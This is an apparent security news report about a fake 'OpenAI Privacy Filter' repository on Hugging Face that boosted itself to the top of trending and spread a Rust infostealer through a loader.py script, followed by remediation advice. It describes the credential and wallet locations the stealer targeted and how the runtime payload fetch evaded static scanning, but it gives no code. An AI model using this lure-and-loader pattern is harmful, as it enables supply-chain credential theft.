Fake OpenAI Repository on Hugging Face Reached #1 Trending, Delivered Rust Infostealer to 244,000 Users

A malicious Hugging Face repository impersonating an official OpenAI project — presented as “OpenAI Privacy Filter”, purportedly a tool for removing private information from datasets before model training — reached the number one trending position on Hugging Face’s model and dataset discovery platform before being removed. HiddenLayer researchers estimate that approximately 244,000 users downloaded and executed the malicious content during the approximately 36 hours the repository was live.

Attack Mechanics

Repository impersonation: The malicious repository was created under a Hugging Face account using a name designed to appear official. The repository title, description, and model card were crafted to closely resemble genuine OpenAI tooling, using OpenAI’s branding elements and citing plausible but fictional OpenAI research papers and team members.

Trending algorithm exploitation: The repository’s rapid ascent to #1 trending was achieved through coordinated engagement — artificially inflating like counts, follows, and download metrics in a pattern consistent with purchased or botnet-generated engagement. Hugging Face’s trending algorithm weights recent engagement, making a short burst of synthetic activity disproportionately effective for trending placement.

Malware delivery: The repository’s README instructed users to run a loader.py script for installation. The Python script downloaded a Rust-compiled binary from an external server, verified its presence, and executed it. The Rust binary is the infostealer payload.

Rust infostealer capabilities: The Rust binary targets:

Browser credential storage (Chrome, Firefox, Edge, Brave, and Chromium-based browsers) — encrypted credential databases and session cookies
Discord authentication tokens
SSH private keys in ~/.ssh/
Git configuration and credentials in ~/.gitconfig and ~/.git-credentials
Cryptocurrency wallet files (MetaMask browser extension storage, Electrum wallet files)
Text files matching patterns associated with API keys and tokens in common locations

All harvested data is compressed and exfiltrated via HTTPS to attacker-controlled infrastructure before the payload deletes itself.

Why Hugging Face Is an Attractive Attack Platform

Hugging Face has become the dominant platform for AI model and dataset distribution, with over 700,000 models and 150,000 datasets hosted — making it the npm equivalent for the AI/ML ecosystem. Developers working with AI tooling have high trust in Hugging Face repositories, particularly those apparently attributed to major AI organisations like OpenAI, Google, Meta, and Anthropic.

The trust model is structurally similar to npm before the introduction of mandatory 2FA for top packages: anyone can create an account with any display name, create repositories with any content, and gain distribution through the platform’s discovery mechanisms.

Immediate Actions for Affected Users

If you ran the loader.py script from the malicious “OpenAI Privacy Filter” repository:

Assume all credentials are compromised — change passwords for all accounts you have authenticated to from the affected machine, prioritising email, cloud providers, GitHub/GitLab, npm, PyPI, Docker Hub, and any services whose API keys were in the harvested locations
Revoke API keys and tokens — regenerate all API keys stored in ~/.gitconfig, ~/.npmrc, ~/.pypirc, and similar credential files
Check for persistent access — the payload’s self-deletion behaviour means the binary may no longer be present, but check for unexpected startup items, cron jobs, or SSH authorised keys added
Notify your team — if your machine had access to shared code repositories, cloud environments, or package publishing credentials, notify your security team as the compromise may have broader organisational scope

Hugging Face Response and Platform Security

Hugging Face removed the malicious repository following HiddenLayer’s report and has committed to enhanced trending algorithm review. The platform has been expanding its security features including repository scanning for malicious code — however, the loader.py approach (fetching the actual payload at runtime from external infrastructure) bypasses static analysis of repository content.

The incident is a reminder that AI/ML development tooling is subject to the same supply chain risks as other software ecosystems — and that the AI developer community, which has grown rapidly and sometimes with less security awareness than traditional software development communities, represents an attractive and relatively underdefended target population.

Share this article